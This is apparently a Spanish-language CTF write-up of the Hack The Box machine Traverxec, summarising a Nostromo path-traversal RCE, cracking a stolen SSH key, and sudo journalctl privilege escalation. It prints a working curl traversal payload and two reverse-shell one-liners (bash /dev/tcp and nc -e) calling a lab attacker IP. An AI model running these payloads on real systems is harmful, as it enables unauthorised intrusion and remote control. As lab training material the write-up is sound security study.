xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Resumen de la resolución
  • Habilidades adquiridas
  • Comandos y herramientas destacables
  • Walkthrough en YouTube:
  1. Writeups
  2. Hack The Box

Traverxec

AnteriorIrkedSiguienteCronos

Última actualización hace 1 año

Resumen de la resolución

  • Explotación de un servidor web Nostromo mediante el uso de un script encontrado en exploit-db

  • Extracción de id_rsa analizando la estructura de archivos del servidor web Nostromo

  • Acceso a la máquina víctima crackeando la contraseña de la id_rsa encriptada

  • Escalada de privilegios a root abusando de un binario journalctl on permisos configurados en el sudoers

Habilidades adquiridas

  • Capacidad de replicar un script de Ruby que abusa de una vulnerabilidad tipo RCE que hace uso de un path traversal mediante una petición por post con Curl

curl -s -X POST "http://10.10.10.165/.%0d./.%0d./.%0d./.%0d./bin/sh" -d '/usr/bin/ping -c 1 10.10.14.29'

Comandos y herramientas destacables

  • Sintáxis de nc y bash para enviar una Reverse Shell

bash -c "bash -i &> /dev/tcp/10.10.14.2/4242 0>&1"
nc -e /bin/bash 10.10.14.2 4242

Walkthrough en YouTube:

https://youtu.be/CiBlBzTG0M4youtu.be